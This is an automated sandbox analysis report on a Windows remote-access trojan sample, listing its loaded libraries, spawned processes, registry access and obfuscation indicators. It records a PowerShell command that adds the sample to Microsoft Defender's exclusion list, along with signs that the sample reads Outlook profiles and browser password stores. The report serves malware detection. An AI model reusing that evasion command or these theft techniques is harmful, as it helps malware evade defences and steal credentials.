            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Se7yaxeobBMdUHx8Vi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.log
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMutant created: \Sessions\1\BaseNamedObjects\tiqdbrBawfEtCyhplyRgDXJO
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etzjvjg0.wmm.ps1
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeFile read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3270967957.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeVirustotal: Detection: 28%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: PHCd.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: Binary string: PHCd.pdb source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe

            Data Obfuscation

            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, frmMain.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.cs | .Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.cs | .Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.5180000.5.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.5180000.5.raw.unpack, PingPong.cs | .Net Code: Justy
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.26c7c54.0.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.26c7c54.0.raw.unpack, PingPong.cs | .Net Code: Justy
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.cs | .Net Code: yj6dS9kw0f System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267E130 push 08418B02h; ret 0_2_0267E143
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267E841 push 14418B02h; ret 0_2_0267E853
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267D238 push eax; iretd 0_2_0267D241
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267F090 push 1C418B02h; ret 0_2_0267F0A3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267F421 push 20418B02h; ret 0_2_0267F413
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_0267DC20 push 08518902h; ret 0_2_0267DC33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 0_2_06ADDC56 push es; ret 0_2_06ADDC58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Code function: 4_2_05641BE8 push eax; retf 4_2_05641BE9
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Static PE information: section name: .text entropy: 7.977489549607041
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Ak4oG7NYOwJL1B3Iuo.cs | High entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Pwpj4xKLD3kV8kZye0j.cs | High entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, QQKot902G4vU2soPiv.cs | High entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, fVqBTE5GN24nXcJ2Na.cs | High entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.cs | High entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, LKGBl8HqPCBQXSKmTW.cs | High entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Q534henmWuNmoyahwo.cs | High entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
